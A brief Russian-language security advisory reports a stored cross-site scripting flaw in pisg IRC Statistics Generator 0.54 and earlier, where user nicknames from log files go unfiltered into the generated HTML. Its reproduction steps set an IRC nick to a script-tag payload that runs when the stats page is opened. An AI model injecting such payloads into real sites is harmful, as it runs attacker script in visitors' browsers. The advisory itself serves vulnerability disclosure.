Программа: pisg IRC Statistics Generator 0.54 и более ранние версии 

Уязвимость обнаружена в pisg statistics generator. Удаленный пользователь может выполнить XSS нападение.
Программ не фильтрует HMTL код из данных, представленных пользователем в поле ‘nick’ при обработке log файлов. 

Пример: 

1. silc
2. /connect silc.net
3. /nick <script>alert(document.domain);</script>
4. /log …
5. /me a couple of times on a channel
6. /quit
3. then generate stats ./pisg
4. surf the index.html



Оставить мнение